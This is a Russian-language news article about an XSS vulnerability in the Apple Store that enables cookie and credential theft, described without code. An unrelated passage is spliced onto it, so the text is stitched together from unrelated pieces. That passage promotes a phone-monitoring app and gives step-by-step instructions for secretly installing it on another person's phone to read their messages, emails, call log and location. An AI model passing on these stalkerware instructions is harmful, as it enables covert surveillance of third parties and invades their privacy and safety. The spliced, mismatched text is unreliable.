Новая XSS уязвимость обнаружена в Apple Store

6acdf267e6825e8679ef12576610b3c7 На ресурсе XSSPosed, где публикуются новости об обнаруженных уязвимостях XSS, появилась новая заметка относительно бреши в защите Apple Store. Один из исследователей детально описал открытие, которое может стать причиной нарушения целостности всей системы, а также хищения огромного количества сторонней пользовательской информации. На том же портале можно найти ещё около шести аналогичных уязвимостей. По всей видимости, корпорация Apple не придаёт этому слишком большое значение, поскольку устраняются дыры крайне медленно.

Злоумышленники могут воспользоваться специальными ссылками, дабы произвести хищение Cookie-файлов жертвы, а затем предпринять целенаправленные спуфи-атаки. В результате может произойти кража логинов и паролей. Единственная защита – регулярная смена личных данных, что ресурс XSSPosed и советует делать всем пользователям Apple Store до момента устранения погрешности. Эксплуатирование заранее сформированных запросов, которые приведут пользователя на поддельную страницу – распространённое явление, которое используется хакерами всего мира. Автоматическая генерация таких ссылок становится настоящей проблемой для серверов, на которых не предпринято достаточных мер безопасности.

Очень странно видеть в подобном списке Apple, чьи ресурсы всегда славились надёжностью, защищённостью, бесперебойностью работы. Это же можно сказать и относительно iOS. Но времена меняются, хакеры увеличивают свой атакующий потенциал. В системе Apple Store размещается огромное количество конфиденциальных данных. И если потеря логина и пароля может просто быть неприятной сама по себе, то хищение данных платёжных систем пользователя потенциально приведёт к сторонним финансовым растратам.

Что касается частоты использования XSS (в котором происходит внедрение на сайт вредоносного скрипта), данный тип атаки располагается на третьем месте. Кроме того, межсайтовый скриптинг применяется профессионалами и для DDoS-атаки, которая в состоянии временно положить всю систему и закрыть доступ на серверы. Существует множество способов внедрения такого кода в целевой сайт. Посетитель заражённого ресурса, оставляющий там конфиденциальные данные, может ни о чём не догадываться, поскольку визуально обнаружить подмену практически невозможно.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.